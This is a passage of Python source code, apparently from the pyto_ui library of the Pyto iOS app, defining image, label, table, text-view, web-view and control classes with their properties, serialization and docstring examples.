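    ui.show_view(image_view)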
"""
def __init__(self, image: "Image" = None, symbol_name: str = None, url: str = None):
self.__py_view__ = __UIImageView__.newView()
self._setup_subclass()
self.image = image
self._symbol_name = None
self._url = None
if url is not None:
self.load_from_url(url)
self._url = url
elif symbol_name is not None:
self.image = image_with_system_name(symbol_name)
self._symbol_name = symbol_name
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["ImageView"]
except KeyError:
return
if "url" in dictionary and isinstance(dictionary["url"], str):
self.load_from_url(dictionary["url"])
elif "symbol" in dictionary and isinstance(dictionary["symbol"], str):
self.image = image_with_system_name(dictionary["symbol"])
elif "path" in dictionary and isinstance(dictionary["path"], str):
self.image = Image.open(dictionary["path"])
def dictionary_representation(self):
r = super().dictionary_representation()
image_view = {}
if self._url is not None:
image_view["url"] = self._url
elif self._symbol_name is not None:
image_view["symbol"] = self._symbol_name
elif self.image is not None and self.image.filename is not None:
image_view["path"] = self.image.filename
r["ImageView"] = image_view
return r
@property
def image(self) -> "Image":
"""
The image displayed on screen. Can be a ``PIL`` image or a ``UIKit`` ``UIImage``. See :func:`~pyto_ui.image_with_system_name` for more information about how to get a symbol image.
:rtype: Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if self.__py_view__.image is not None:
self.__py_view__.image.release()
if new_value is None:
self.__py_view__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
def load_from_url(self, url):
"""
Loads and displays the image at the given URL.
:param url: The URL of the image.
"""
def _set_image(self, url):
from PIL import Image
self.image = Image.open(urlopen(url))
Thread(target=_set_image, args=(self, url)).start()
class Label(View):
"""
A view displaying non-editable, non-selectable text.
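A minimal usage sketch (text and alignment are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
label = ui.Label("Hello World")
label.text_alignment = ui.TEXT_ALIGNMENT_CENTER
ui.show_view(label, ui.PRESENTATION_MODE_SHEET)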
"""
def __init__(self, text: str = ""):
self.__py_view__ = __PyLabel__.newView()
self._setup_subclass()
self.text = text
self._html = None
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Label"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.text = get("text", default="")
html = get("html")
if html is not None:
self.load_html(html)
font = get("font")
if font is not None:
font_obj = Font.__new__(Font)
font_obj.configure_from_dictionary(font)
self.font = font_obj
alignment = get("alignment")
if alignment is not None:
name = "TEXT_ALIGNMENT_"+(alignment.upper())
self.text_alignment = globals()[name]
line_break_mode = get("line_break_mode")
if line_break_mode is not None:
name = "LINE_BREAK_MODE_"+(line_break_mode.upper())
self.line_break_mode = globals()[name]
self.number_of_lines = get("number_of_lines", default=1)
self.adjusts_font_size_to_fit_width = get("adjusts_font_size_to_fit_width", default=False)
def dictionary_representation(self):
r = super().dictionary_representation()
label = {}
label["text"] = self.text
if self._html is not None:
label["html"] = self._html
if self.text_color is not None:
label["color"] = self.text_color.dictionary_representation()
if self.font is not None:
label["font"] = self.font.dictionary_representation()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_ALIGNMENT_") and globals()[key] == self.text_alignment:
label["alignment"] = key.split("TEXT_ALIGNMENT_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("LINE_BREAK_MODE_") and globals()[key] == self.line_break_mode:
label["line_break_mode"] = key.split("LINE_BREAK_MODE_")[1].lower()
label["adjusts_font_size_to_fit_width"] = self.adjusts_font_size_to_fit_width
label["number_of_lines"] = self.number_of_lines
r["Label"] = label
return r
def load_html(self, html):
"""
Loads HTML in the Label.
:param html: The HTML code to load.
"""
self._html = html
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text to be displayed on the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def text_color(self) -> Color:
"""
The color of the text.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The text's alignment. For possible values, see `Text Alignment <constants.html#text-alignment>`_ constants.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def line_break_mode(self) -> LINE_BREAK_MODE:
"""
The line break mode.
:rtype: `Line Break Mode <constants.html#line-break-mode>`_
"""
return self.__py_view__.lineBreakMode
@line_break_mode.setter
def line_break_mode(self, new_value: LINE_BREAK_MODE):
self.__py_view__.lineBreakMode = new_value
@property
def adjusts_font_size_to_fit_width(self) -> bool:
"""
A boolean indicating whether the label adjusts its font size to fit its size.
:rtype: bool
"""
return self.__py_view__.adjustsFontSizeToFitWidth
@adjusts_font_size_to_fit_width.setter
def adjusts_font_size_to_fit_width(self, new_value: bool):
self.__py_view__.adjustsFontSizeToFitWidth = new_value
@property
def allows_default_tightening_for_truncation(self) -> bool:
return self.__py_view__.allowsDefaultTighteningForTruncation
@allows_default_tightening_for_truncation.setter
def allows_default_tightening_for_truncation(self, new_value: bool):
self.__py_view__.allowsDefaultTighteningForTruncation = new_value
@property
def number_of_lines(self) -> int:
"""
The number of lines displayed in the label. Set to ``0`` to show all the text.
:rtype: int
"""
return self.__py_view__.numberOfLines
@number_of_lines.setter
def number_of_lines(self, new_value: int):
self.__py_view__.numberOfLines = new_value
class TableViewCell(View):
"""
A cell contained in a :class:`~pyto_ui.TableView`.
Can have a title, a subtitle, an image and an accessory view.
For a list of supported styles, see `Table View Cell Style <constants.html#table-view-cell-style>`_ constants.
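A minimal usage sketch (titles and the accessory type are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
cell = ui.TableViewCell(ui.TABLE_VIEW_CELL_STYLE_SUBTITLE)
cell.text_label.text = "Title"
cell.detail_text_label.text = "Subtitle"
cell.accessory_type = ui.ACCESSORY_TYPE_DISCLOSURE_INDICATOR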
"""
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TableViewCell"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.movable, self.removable = get("movable", default=False), get("removable", default=False)
if get("content") is not None:
content = get("content")
if isinstance(content, View):
content = content.dictionary_representation()
self.content_view.configure_from_dictionary(content)
if get("image") is not None and self.image_view is not None:
image = get("image")
if isinstance(image, View):
image = image.dictionary_representation()
self.image_view.configure_from_dictionary(image)
if get("label") is not None and self.text_label is not None:
label = get("label")
if isinstance(label, View):
label = label.dictionary_representation()
self.text_label.configure_from_dictionary(label)
if get("detail_label") is not None and self.detail_text_label is not None:
detail_label = get("detail_label")
if isinstance(detail_label, View):
detail_label = detail_label.dictionary_representation()
self.detail_text_label.configure_from_dictionary(detail_label)
accessory_type = get("accessory_type")
if accessory_type is not None:
name = "ACCESSORY_TYPE_"+(accessory_type.upper())
self.accessory_type = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
table_view_cell = {
"movable": self.movable,
"removable": self.removable,
"content": self.content_view.dictionary_representation(),
}
if self.image_view is not None:
table_view_cell["image"] = self.image_view.dictionary_representation()
if self.text_label is not None:
table_view_cell["label"] = self.text_label.dictionary_representation()
if self.detail_text_label is not None:
table_view_cell["detail_label"] = self.detail_text_label.dictionary_representation()
for key in list(globals().keys()).copy():
if key.startswith("ACCESSORY_TYPE_") and globals()[key] == self.accessory_type:
table_view_cell["accessory_type"] = key.split("ACCESSORY_TYPE_")[1].lower()
r["TableViewCell"] = table_view_cell
return r
def __init__(
self, style: TABLE_VIEW_CELL_STYLE = __v__("TABLE_VIEW_CELL_STYLE_DEFAULT")
):
if style == "TABLE_VIEW_CELL_STYLE_DEFAULT":
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(
TABLE_VIEW_CELL_STYLE_DEFAULT
)
else:
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
self._setup_subclass()
@property
def movable(self) -> bool:
"""
A boolean indicating whether the cell is movable. If set to ``True``, the container :class:`TableViewSection` object should handle the move.
:rtype: bool
"""
return self.__py_view__.movable
@movable.setter
def movable(self, new_value: bool):
self.__py_view__.movable = new_value
@property
def removable(self) -> bool:
"""
A boolean indicating whether the cell is removable. If set to ``True``, the container :class:`TableViewSection` object should handle the removal.
:rtype: bool
"""
return self.__py_view__.removable
@removable.setter
def removable(self, new_value: bool):
self.__py_view__.removable = new_value
_content_view = None
@property
def content_view(self) -> View:
"""
(Read Only) The view contained in the cell. Custom views should be added inside it.
:rtype: View
"""
if self._content_view is not None:
return self._content_view
_view = View()
_view.__py_view__ = self.__py_view__.contentView
self._content_view = _view
_view.__py_view__.retainReference()
_view.__py_view__.retain()
return _view
_image_view = None
@property
def image_view(self) -> ImageView:
"""
(Read Only) The view containing an image. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: ImageView
"""
if self._image_view is not None:
return self._image_view
view = self.__py_view__.imageView
if view is None:
return None
else:
_view = ImageView()
_view.__py_view__ = view
self._image_view = _view
view.retainReference()
return _view
_text_label = None
@property
def text_label(self) -> Label:
"""
(Read Only) The label containing the main text of the cell.
:rtype: Label
"""
if self._text_label is not None:
return self._text_label
view = self.__py_view__.textLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
self._text_label = _view
view.retainReference()
view.retain()
return _view
_detail_text_label = None
@property
def detail_text_label(self) -> Label:
"""
(Read Only) The label containing secondary text. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: Label
"""
if self._detail_text_label is not None:
return self._detail_text_label
view = self.__py_view__.detailLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
self._detail_text_label = _view
view.retainReference()
view.retain()
return _view
@property
def accessory_type(self) -> ACCESSORY_TYPE:
"""
The type of accessory view placed to the right of the cell. See `Accessory Type <constants.html#accessory_type>`_ constants for possible values.
:rtype: `Accessory Type <constants.html#accessory_type>`_.
"""
return self.__py_view__.accessoryType
@accessory_type.setter
def accessory_type(self, new_value: ACCESSORY_TYPE):
self.__py_view__.accessoryType = new_value
class TableView(View):
"""
A view containing a list of cells.
A Table View has a list of :class:`TableViewSection` objects that represent groups of cells, and supports two possible styles. See `Table View Style <constants.html#table-view-style>`_.
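A minimal usage sketch (section title and cell text are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
cell = ui.TableViewCell()
cell.text_label.text = "Row 1"
section = ui.TableViewSection("Section", [cell])
table_view = ui.TableView(sections=[section])
ui.show_view(table_view, ui.PRESENTATION_MODE_SHEET)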
"""
def dictionary_representation(self):
d = super().dictionary_representation()
sections = []
for section in self.sections:
sections.append(section.dictionary_representation())
d["TableView"] = {
"sections": sections
}
return d
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TableView"]
except KeyError:
return
if "sections" in dictionary and dictionary["sections"] is not None:
sections = []
for section in dictionary["sections"]:
_section = TableViewSection()
_section._parent = self._parent
_section.configure_from_dictionary(section)
sections.append(_section)
self.sections = sections
def __init__(
self,
style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_STYLE_PLAIN"),
sections: List[TableViewSection] = [],
):
if style == "TABLE_VIEW_STYLE_PLAIN":
self.__py_view__ = __PyTableView__.newViewWithStyle(TABLE_VIEW_STYLE_PLAIN)
else:
self.__py_view__ = __PyTableView__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
self.sections = sections
self._setup_subclass()
@property
def reload_action(self) -> Callable[[TableView], None]:
"""
A function called when the user reloads the Table View, for example by pulling to refresh. Takes the Table View as parameter.
:rtype: Callable[[TableView], None]
"""
action = self.__py_view__.reloadAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@reload_action.setter
def reload_action(self, new_value: Callable[[TableView], None]):
if new_value is None:
self.__py_view__.reloadAction = None
else:
self.__py_view__.reloadAction = _values.value(new_value)
@property
def edit_button_item(self) -> ButtonItem:
"""
Returns a bar button item that toggles its title and associated state between Edit and Done.
The button item is setup to edit the Table View.
:rtype: ButtonItem
"""
item = ButtonItem()
item.__py_item__ = self.__py_view__.editButtonItem
return item
@property
def sections(self) -> List[TableViewSection]:
"""
A list of :class:`TableViewSection` containing cells to be displayed on the Table View.
Setting a new value will automatically reload the contents of the Table View.
:rtype: List[TableViewSection]
"""
sections = self.__py_view__.sections
py_sections = []
for section in sections:
py_section = TableViewSection("", [])
py_section.__py_section__ = section
py_sections.append(py_section)
return py_sections
@sections.setter
def sections(self, new_value: List[TableViewSection]):
sections = []
for section in new_value:
section.__py_section__.tableView = self.__py_view__
sections.append(section.__py_section__)
self.__py_view__.sections = sections
def deselect_row(self):
"""
Deselects the current selected row.
"""
self.__py_view__.deselectRowAnimated(True)
class TextView(View):
"""
An editable, multiline and scrollable view containing text.
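A minimal usage sketch (the text is illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
text_view = ui.TextView("Type here...")
text_view.autocorrection = False
ui.show_view(text_view, ui.PRESENTATION_MODE_SHEET)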
"""
def __init__(self, text=""):
self.__py_view__ = __PyTextView__.newView()
self.__py_view__.managedValue = _values.value(self)
self.text = text
self._setup_subclass()
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TextView"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.selected_range = tuple(get("selected_range", default=[]))
self.text = get("text", default="")
self.editable = get("editable", default=True)
self.selectable = get("selectable", default=True)
self.smart_quotes = get("smart_quotes", default=True)
self.smart_dashes = get("smart_dashes", default=True)
self.autocorrection = get("autocorrection", default=True)
self.secure = get("secure", default=False)
if get("html") is not None:
self.load_html(get("html"))
if get("color") is not None:
color = Color.__new__(Color)
color.configure_from_dictionary(get("color"))
self.text_color = color
if get("font") is not None:
font = Font.__new__(Font)
font.configure_from_dictionary(get("font"))
self.font = font
text_alignment = get("text_alignment")
if text_alignment is not None:
name = "TEXT_ALIGNMENT_"+(text_alignment.upper())
self.text_alignment = globals()[name]
keyboard_type = get("keyboard_type")
if keyboard_type is not None:
name = "KEYBOARD_TYPE_"+(keyboard_type.upper())
self.keyboard_type = globals()[name]
keyboard_appearance = get("keyboard_appearance")
if keyboard_appearance is not None:
name = "KEYBOARD_APPEARANCE__"+(keyboard_appearance.upper())
self.keyboard_appearance = globals()[name]
autocapitalization_type = get("autocapitalization_type")
if autocapitalization_type is not None:
name = "AUTO_CAPITALIZE_"+(autocapitalization_type.upper())
self.autocapitalization_type = globals()[name]
return_key_type = get("return_key_type")
if return_key_type is not None:
name = "RETURN_KEY_TYPE_"+(return_key_type.upper())
self.return_key_type = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
text_view = {
"selected_range": self.selected_range,
"text": self.text,
"editable": self.editable,
"selectable": self.selectable,
"smart_quotes": self.smart_quotes,
"smart_dashes": self.smart_dashes,
"autocorrection": self.autocorrection,
"secure": self.secure
}
if self._html is not None:
text_view["html"] = self._html
if self.text_color is not None:
text_view["color"] = self.text_color.dictionary_representation()
if self.font is not None:
text_view["font"] = self.font.dictionary_representation()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_ALIGNMENT_") and globals()[key] == self.text_alignment:
text_view["alignment"] = key.split("TEXT_ALIGNMENT_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_TYPE_") and globals()[key] == self.keyboard_type:
text_view["keyboard_type"] = key.split("KEYBOARD_TYPE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_APPEARANCE__") and globals()[key] == self.keyboard_appearance:
text_view["keyboard_appearance"] = key.split("KEYBOARD_APPEARANCE__")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("AUTO_CAPITALIZE_") and globals()[key] == self.autocapitalization_type:
text_view["autocapitalization_type"] = key.split("AUTO_CAPITALIZE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("RETURN_KEY_TYPE_") and globals()[key] == self.return_key_type:
text_view["return_key_type"] = key.split("RETURN_KEY_TYPE_")[1].lower()
r["TextView"] = text_view
return r
@property
def selected_range(self) -> Tuple[int, int]:
"""
Returns the selected text range. A tuple of two integers (start, end).
:rtype: Tuple[int, int]
"""
return (int(self.__py_view__.range[0]), int(self.__py_view__.range[1]))
@property
def did_begin_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View begins editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View ends editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def did_change(self) -> Callable[[TextView], None]:
"""
A function called when the Text View's text changes. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didChangeText
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_change.setter
def did_change(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didChangeText = None
else:
self.__py_view__.didChangeText = _values.value(new_value)
_html = None
def load_html(self, html):
"""
Loads HTML in the Text View.
:param html: The HTML code to load.
"""
self._html = html
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text contained in the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def editable(self) -> bool:
"""
A boolean indicating whether the text is editable.
:rtype: bool
"""
return self.__py_view__.editable
@editable.setter
def editable(self, new_value: bool):
self.__py_view__.editable = new_value
@property
def selectable(self) -> bool:
"""
A boolean indicating whether the text is selectable.
:rtype: bool
"""
return self.__py_view__.selectable
@selectable.setter
def selectable(self, new_value: bool):
self.__py_view__.selectable = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing the text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
if "widget" not in os.environ:
class WebView(View):
"""
A View that displays web content.
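A minimal usage sketch (the URL is illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
web_view = ui.WebView(url="https://www.example.com")
ui.show_view(web_view, ui.PRESENTATION_MODE_SHEET)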
"""
class JavaScriptException(Exception):
"""
An exception raised while running JavaScript code. Raised by :meth:`~pyto_ui.WebView.evaluate_js`.
"""
pass
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["WebView"]
except KeyError:
return
if "html" in dictionary and dictionary["html"] is not None:
try:
base_url = dictionary["base_url"]
except KeyError:
base_url = None
self.load_html(dictionary["html"], base_url=base_url)
elif "url" in dictionary and dictionary["url"] is not None:
self.load_url(dictionary["url"])
def dictionary_representation(self):
r = super().dictionary_representation()
web_view = {}
if self._url is not None:
web_view["url"] = self._url
elif self._html is not None:
web_view["html"] = self._html
web_view["base_url"] = self._base_url
r["WebView"] = web_view
return r
def __init__(self, url: str = None):
self.__py_view__ = __PyWebView__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
if callable(self.did_finish_loading):
self.__py_view__.didFinishLoading = _values.value(self.did_finish_loading)
if callable(self.did_fail_loading):
self.__py_view__.didFailLoading = _values.value(self.did_fail_loading)
if callable(self.did_start_loading):
self.__py_view__.didStartLoading = _values.value(self.did_start_loading)
if callable(self.did_receive_message):
self.__py_view__.didReceiveMessage = _values.value(self.did_receive_message)
if url is not None:
self.load_url(url)
def evaluate_js(self, code) -> str:
"""
Runs JavaScript code and returns a string representation of the evaluation result. Raises a :class:`~pyto_ui.WebView.JavaScriptException` if the evaluation fails.
:param code: JavaScript code to run.
:rtype: str
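A minimal usage sketch (URL and expression are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
web_view = ui.WebView(url="https://www.example.com")
result = web_view.evaluate_js("1 + 1")  # "2"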
"""
code = NSString.alloc().initWithUTF8String(code.encode("utf-8"))
result = self.__py_view__.evaluateJavaScript(code)
code.release()
if result is None:
return None
else:
_result = str(result)
result = _result
if result.startswith("_VALUE_:"):
return result.replace("_VALUE_:", "", 1)
elif result.startswith("_ERROR_:"):
raise self.__class__.JavaScriptException(
result.replace("_ERROR_:", "", 1)
)
_url = None
def load_url(self, url: str):
"""
Loads a URL.
:param url: The URL to load. Can be 'http://', 'https://' or 'file://'.
"""
self._url = url
self.__py_view__.loadURL(url)
def load_file_path(self, path: str):
"""
Loads a file.
:param path: The path of the file to load.
"""
url = str(NSURL.alloc().initFileURLWithPath(os.path.abspath(path)).absoluteString)
self._url = url
self.__py_view__.loadURL(url)
_html = None
_base_url = None
def load_html(self, html: str, base_url: str = None):
"""
Loads an HTML string.
:param html: The HTML code to load.
:param base_url: An optional URL used to resolve relative paths.
"""
baseURL = base_url
if baseURL is not None:
baseURL = str(base_url)
self._html = html
self._base_url = base_url
self.__py_view__.loadHTML(html, baseURL=baseURL)
def reload(self):
"""
Reloads the Web View.
"""
self.__py_view__.reload()
def stop(self):
"""
Stops loading content.
"""
self.__py_view__.stop()
def go_back(self):
"""
Goes back.
"""
self.__py_view__.goBack()
def go_forward(self):
"""
Goes forward.
"""
self.__py_view__.goForward()
@property
def can_go_back(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_back` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoBack
@property
def can_go_forward(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_forward` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoForward
@property
def is_loading(self) -> bool:
"""
(Read Only) A boolean indicating whether the Web View is loading content.
:rtype: bool
"""
return self.__py_view__.isLoading
@property
def url(self) -> str:
"""
(Read Only) The current URL loaded into the Web View.
:rtype: str
"""
url = self.__py_view__.url
if url is None:
return None
else:
return str(url)
def register_message_handler(self, name: str):
"""
Adds a script message handler.
Adding a script message handler with name ``name`` causes the JavaScript function ``window.webkit.messageHandlers.name.postMessage(messageBody)`` to be defined in all frames in all web views that use the user content controller.
:param name: The name of the message handler.
"""
self.__py_view__.registerMessageHandler(name)
@property
def did_receive_message(self) -> Callable[[WebView, str, object], None]:
"""
A function called when a script message is received from a webpage.
Takes the sender Web View, the name of the message and the content of the message as parameters.
The following example script shows how to send a message from a JavaScript page and how to receive it from the Web View.
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def did_receive_message(web_view, name, message):
print(name, message)
web_view = ui.WebView()
web_view.did_receive_message = did_receive_message
web_view.register_message_handler("webView")
web_view.load_html('''
<h1> Hello World </h1>
<script>
window.webkit.messageHandlers.webView.postMessage({foo:"bar"})
</script>
''')
ui.show_view(web_view, ui.PRESENTATION_MODE_SHEET)
:rtype: Callable[[WebView, str, object], None]
"""
action = self.__py_view__.didReceiveMessage
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_receive_message.setter
def did_receive_message(self, new_value: Callable[[WebView, str, object], None]):
if new_value is None:
self.__py_view__.didReceiveMessage = None
else:
self.__py_view__.didReceiveMessage = _values.value(new_value)
@property
def did_start_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View starts loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didStartLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_start_loading.setter
def did_start_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didStartLoading = None
else:
self.__py_view__.didStartLoading = _values.value(new_value)
@property
def did_finish_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View finished loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didFinishLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_finish_loading.setter
def did_finish_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didFinishLoading = None
else:
self.__py_view__.didFinishLoading = _values.value(new_value)
@property
def did_fail_loading(self) -> Callable[[WebView, str], None]:
"""
A function called when the Web View failed to load contents. Takes the sender Web View and a string describing the error as parameters.
:rtype: Callable[[WebView, str], None]
"""
action = self.__py_view__.didFailLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_fail_loading.setter
def did_fail_loading(self, new_value: Callable[[WebView, str], None]):
if new_value is None:
self.__py_view__.didFailLoading = None
else:
self.__py_view__.didFailLoading = _values.value(new_value)
##################
# MARK: - Control Classes
##################
class Control(View):
"""
The base class for controls, which are visual elements that convey a specific action or intention in response to user interactions.
Inherited by :class:`Button`, :class:`SegmentedControl`, :class:`Slider`, :class:`Switch` and :class:`TextField`.
"""
def __init__(self):
self.__py_view__ = __PyControl__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
if callable(self.action):
self.__py_view__.action = _values.value(self.action)
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
try:
dictionary = dictionary["Control"]
except KeyError:
return
if "enabled" in dictionary and dictionary["enabled"] is not None:
self.enabled = dictionary["enabled"]
horizontal_alignment = get("horizontal_alignment")
if horizontal_alignment is not None:
